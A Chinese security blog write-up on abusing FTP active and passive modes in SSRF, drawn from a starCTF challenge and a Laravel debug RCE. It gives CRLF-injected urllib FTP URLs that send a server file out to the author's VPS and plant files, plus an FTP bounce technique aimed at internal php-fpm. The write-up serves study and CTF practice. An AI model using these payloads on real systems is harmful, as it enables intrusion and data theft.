ssrf
中常用的协议有http
,gopher
等。但http
协议在ssrf
中的用处也仅限于访问内网页面,在可以crlf
的情况下才有可能扩大攻击范围。gopher
协议比较特殊,在部分环境下支持此协议,如:curl
。但还有一些环境就不支持了,如:urllib.request
模块。
但最近的laravel
框架的rce吸引了我的注意力。此上面提供的文章中,研究员在可使用的协议受到约束的条件下,选择使用ftp
协议攻击php-fpm
以达到rce
。出于此,笔者决定探究ftp
协议在ssrf
中都有哪些应用。
ftp
协议是文件传输协议,其使用模式有两种:
主动模式下,客户端向服务端发送连接请求命令PORT a,a,a,a,b,c
,其中a
是客户端ipv4
的地址,b
和c
记录了一个由客户端开放的端口(b×256)+c
。随后服务端尝试连接客户端指定的地址。连接成功后,两者开始进行文件的传输。
但由于客户端由于防火墙等原因,导致服务端无法连接至客户端。为了解决这个问题,诞生了另一种模式。
被动模式下,客户端向服务端发送连接请求命令PASV
,随后服务端返回一个类似于右边字符串的响应227 Entering passive mode (a,a,a,a,b,c).
,告诉客户端连接对应的地址进行文件传输。
发现了吗?在上面的命令中a, b, c
如果可以受到我们控制,不就可以达到ssrf
的效果了吗?
在刚刚结束的starctf
中,其中一题oh-my-bet
便是用到了主动模式下的ftp
进行ssrf
,发送二进制数据至mongoDB
更改数据库中数据。
以下是原题目中使用pyftpdlib
模块搭建于内网中的ftp server
。
# import logging
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
authorizer = DummyAuthorizer()
authorizer.add_user("fan", "root", ".",perm="elrafmwMT")
authorizer.add_anonymous(".")
handler = FTPHandler
handler.permit_foreign_addresses = True #<-- 此句很重要,原因后说
handler.passive_ports = range(2000, 2030)
handler.authorizer = authorizer
# logging.basicConfig(level=logging.DEBUG) <-- 在测试时加入此句方便dubug
server = FTPServer(("0.0.0.0", 8877), handler)
server.serve_forever()
除ftp server
,还有一个存在于内网的mongoDB
,用于储存flask-session
的pickle
序列化数据。以及一个内网mysql
用于储存用户数据。最后是向公网开放的flask web server
。
原题目中存在一个参数可控的urllib.request.urlopen(value)
,且python
版本3.6,存在crlf
漏洞。
题目最后要求rce
。唯一有可能的突破点,是储存在mongoDB
中的flask-session
序列化数据。但如果使用http
协议crlf
传输mongoDB
的数据是不行的,会被mongoDB
拒绝连接。gopher
协议不被urllib.request.urlopen(value)
支持。所以最终着眼于ftp
协议。
本文为讲解ftp
在ssrf
中的应用,简化上面环境,假设ftp-server.py
所在目录有以下文件。
先在urllib
中连接尝试读取文件。
urllib
在成功连接控制端口后,会发送url
中的用户名与密码,因此可以在密码后crlf
,注入其它命令。
以下代码会发送ftp-server.py
文件至自己vps
的2333端口。
ur.urlopen("ftp://fan:root\r\nTYPE I\r\nCWD .\r\nPORT v,p,s,ip,9,29\r\nRETR ftp-server.py\r\[email protected]:8877/ftp-server.py").read()
既然都可以上传至自己vps
上的指定端口,那么就可以将其改为内网的任意ip
与端口。
ip
可控,接下来就是如何控制内容了。
正常情况下,单凭urlopen
是无法上传文件的,但因为存在crlf
漏洞,我们可以轻易上传文件。
使用以下代码,可以告诉服务器:从自己vps
的2333端口获取test
文件,并保存。
ur.urlopen("ftp://fan:root\r\nTYPE I\r\nCWD .\r\nPORT v,p,s,ip,9,29\r\nSTOR test\r\[email protected]:8877/").read()
这里可以简单写一个socket
监听。
import socket
s = socket.socket()
s.bind(("0.0.0.0", 2333))
s.listen()
c, a = s.accept()
print(a)
c.send(b'\x02\x03\x03')
c.close()
s.close()
成功上传。
上面是对ftp server
进行ssrf
,但在真实情况下就不太可能出现了。这种攻击被称为FTP bounce attack
,是一种比较老旧的攻击方式,现在的ftp server
都会禁止这一行为。但在此题中handler.permit_foreign_addresses = True
,让这种攻击变为可能。
回到开头所说的laravel debug rce
。
根据原文,在模块中有以下抽象过的代码。
$data = file_get_contents($file);
file_put_contents($file, $data);
文章首先给出的方法是利用php
伪协议清空log
文件,然后写入phar
数据,再使用phar
协议达成反序列化。但还有一个方法,文章没有细说,就是使用ftp
协议攻击php-fpm
。
那么具体思路如下:
php
从我们的ftp server
获取payload
,存入变量中。php
上传文件时,将被动模式的连接地址改为php
所在服务器的内网地址,上传payload
攻击。我们先看一看php
的文件类函数是如何发送ftp
请求的。
依然是利用上面pyftpdlib
模块的脚本开启ftp
服务。在命令行使用:
php -r '$data = file_get_contents(\'ftp://fan:[email protected]:8877/test\');file_put_contents(\'ftp://fan:[email protected]:8877/test\', $data);'
查看ftp
服务日志。(这里仅列出关键信息)
; php获取文件
DEBUG:pyftpdlib:127.0.0.1:18486-[] -> 220 pyftpdlib 1.5.6 ready.
DEBUG:pyftpdlib:127.0.0.1:18486-[] <- USER fan
DEBUG:pyftpdlib:127.0.0.1:18486-[] -> 331 Username ok, send password.
DEBUG:pyftpdlib:127.0.0.1:18486-[fan] <- PASS ******
DEBUG:pyftpdlib:127.0.0.1:18486-[fan] -> 230 Login successful.
DEBUG:pyftpdlib:127.0.0.1:18486-[fan] <- TYPE I
DEBUG:pyftpdlib:127.0.0.1:18486-[fan] -> 200 Type set to: Binary.
DEBUG:pyftpdlib:127.0.0.1:18486-[fan] <- SIZE /test
DEBUG:pyftpdlib:127.0.0.1:18486-[fan] -> 213 4
DEBUG:pyftpdlib:127.0.0.1:18486-[fan] <- EPSV
DEBUG:pyftpdlib:127.0.0.1:18486-[fan] -> 500 'EPSV': command not understood.
DEBUG:pyftpdlib:127.0.0.1:18486-[fan] <- PASV
DEBUG:pyftpdlib:127.0.0.1:18486-[fan] -> 227 Entering passive mode (127,0,0,1,35,40).
DEBUG:pyftpdlib:127.0.0.1:18486-[fan] <- RETR /test
DEBUG:pyftpdlib:127.0.0.1:18486-[fan] -> 150 File status okay. About to open data connection.
DEBUG:pyftpdlib:127.0.0.1:18486-[fan] -> 226 Transfer complete.
DEBUG:pyftpdlib:127.0.0.1:18486-[fan] <- QUIT
DEBUG:pyftpdlib:127.0.0.1:18486-[fan] -> 221 Goodbye.
; php上传文件
DEBUG:pyftpdlib:127.0.0.1:18488-[] -> 220 pyftpdlib 1.5.6 ready.
DEBUG:pyftpdlib:127.0.0.1:18488-[] <- USER fan
DEBUG:pyftpdlib:127.0.0.1:18488-[] -> 331 Username ok, send password.
DEBUG:pyftpdlib:127.0.0.1:18488-[fan] <- PASS ******
DEBUG:pyftpdlib:127.0.0.1:18488-[fan] -> 230 Login successful.
DEBUG:pyftpdlib:127.0.0.1:18488-[fan] <- TYPE I
DEBUG:pyftpdlib:127.0.0.1:18488-[fan] -> 200 Type set to: Binary.
DEBUG:pyftpdlib:127.0.0.1:18488-[fan] <- SIZE /test
DEBUG:pyftpdlib:127.0.0.1:18488-[fan] -> 213 4
在这里,php
先使用SIZE
命令确认文件是否存在,然后使用了EPSV
命令,这个命令含义是启用扩展被动模式。ftp server
将指返回端口,但不返回ip
。解决方法很简单,找一个不支持这个扩展的服务器就行。这里笔者是修改了pyftpdlib
模块的源码,使其返回500 'EPSV': command not understood.
。
综合上面信息,有两个难点:
php
获取和上传的是同一个文件,file_put_contents
会检测文件是否已经存在,如果存在则不会进行上传操作。因此需要在php
获取文件后的瞬间删除该文件。ftp client
都使用被动模式。php
获取文件时,要求被动模式返回ftp server
自己的地址。但php
上传文件时,返回的却是php
所在服务器的内网地址。很明显,上面的问题套用一般的轮子很难解决。因为ftp
协议本身的交互没有那么复杂。所以尝试做一个fake ftp server
(https://gitlab.in.starcross.cn/AFKL/laravel-debug-ftp-ssrf)。
这里尝试将一个test
字符串从外网,通过php
的ftp client
发送至php
所在服务器内网的2333端口。
效果如下:
ftp
可以在ssrf
中起到作用,其原因便是PORT
和PASV
两个命令导致的连接跳转。把握此点,便可使ftp
在漏洞利用中大放异彩!